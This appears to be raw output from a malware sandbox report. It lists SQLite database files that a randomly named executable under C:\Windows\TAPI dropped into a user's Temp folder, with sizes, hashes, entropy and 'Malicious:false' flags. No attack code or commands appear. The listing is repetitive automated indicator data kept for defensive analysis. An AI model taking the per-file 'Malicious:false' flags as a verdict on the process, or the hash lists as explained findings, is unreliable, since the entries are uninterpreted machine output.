                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8f5JjWHV1O

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8phd58GGFK

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8sAHVyjt4c

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\96hM5rUlvr

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\99mSimhKok

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9BYKXac1zf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9hjm3Y75U0

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\A5Xng9bXS8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AOkSOZl2Qm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ARb9y5hnbi

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ac2geNu7i8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AptR0gUtkx

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BcIFAwm04X

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\C3k2JvGViO

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\C4dmyxNoQD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\C6WXCYBV07

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CFGMa41koI

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CLpkP0M4mW

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CYve8XxDXw

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Cr9tpEVmQd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

